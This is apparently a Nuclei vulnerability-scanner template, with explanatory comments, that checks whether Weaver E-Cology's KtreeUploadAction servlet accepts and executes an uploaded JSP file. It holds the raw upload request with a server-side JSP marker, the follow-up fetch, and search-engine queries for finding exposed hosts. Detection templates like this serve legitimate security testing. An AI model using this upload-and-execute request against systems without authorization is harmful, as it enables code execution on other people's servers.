# Nuclei HTTP template: checks whether the Weaver E-Cology KtreeUploadAction
# servlet accepts a .jsp upload and whether the stored file is then executed
# by the server. Two requests are sent: a multipart upload of a marker file,
# then a GET of the path reported in the upload response.
#
# Defender's view: in web/access logs this check appears as a multipart POST
# to the KtreeUploadAction servlet (action=image) carrying a filename that
# ends in .jsp, followed by a GET for the url returned by that POST.
id: weaver-ktreeuploadaction-file-upload

info:
  name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
  reference:
    - https://buaq.net/go-117479.html
  metadata:
    verified: true
    # Two HTTP requests per target (upload, then fetch).
    max-request: 2
    shodan-query: ecology_JSessionid
    fofa-query: app="泛微-协同办公OA"
  # "intrusive": this check writes a file to the scanned host.
  tags: weaver,ecology,fileupload,intrusive
# num1 and num2 are random per run; result is their product. The uploaded
# marker prints num1 * num2 from server-side code, so the product shows up in
# the second response only if the JSP was actually executed. A server that
# merely stores or echoes the upload would return the unevaluated text.
variables:
  num1: "{{rand_int(40000, 50000)}}"
  num2: "{{rand_int(40000, 50000)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  # Request 1: multipart upload with a random "<name>.jsp" filename while the
  # part is declared as image/jpeg. The marker prints the product and then
  # deletes its own file on disk, so it cleans up only when it is executed.
  # If request 2 fails or the file is never executed, the marker stays on the
  # host and has to be removed by hand (path is in the upload response).
  - raw:
      - |
        @timeout: 20s
        POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib

        ------WebKitFormBoundarywgljfvib
        Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        <%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
        ------WebKitFormBoundarywgljfvib--
      # Request 2: fetch the stored file. {{filename}} is filled in by the
      # internal extractor below from the response to request 1.
      # NOTE(review): assumes the captured url is a server-relative path that
      # starts with "/" - confirm against a real upload response.
      - |
        @timeout: 20s
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      # Both expressions must hold: the upload answered 200 with the strings
      # 'original' and 'SUCCESS' in its body, and the fetch answered 200 with
      # the computed product in its body.
      - type: dsl
        dsl:
          - "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
          - "contains(body_2, '{{result}}') && status_code_2 == 200"
        condition: and

    extractors:
      # Captures group 1 (the value between 'url':' and ','title) as
      # "filename". internal: true keeps it for request chaining rather than
      # reporting it as a finding.
      - type: regex
        name: filename
        group: 1
        regex:
          - "','url':'(.*?)','title"
        internal: true
# NOTE(review): the digest below was generated for the template as published.
# After any edit, re-sign the template; otherwise nuclei is expected to treat
# it as unsigned - confirm with your signing workflow.
# digest: 490a0046304402203845240787e3da61949c359ff2e44cc0797d850f8aa35cbf4e8a9cb052a3bb5b022003685a977b9463c7de0e27f8227f54e5559e6dc17663eb17c1f35122ea4a7f24:922c64590222798bb761d5b6d8e72950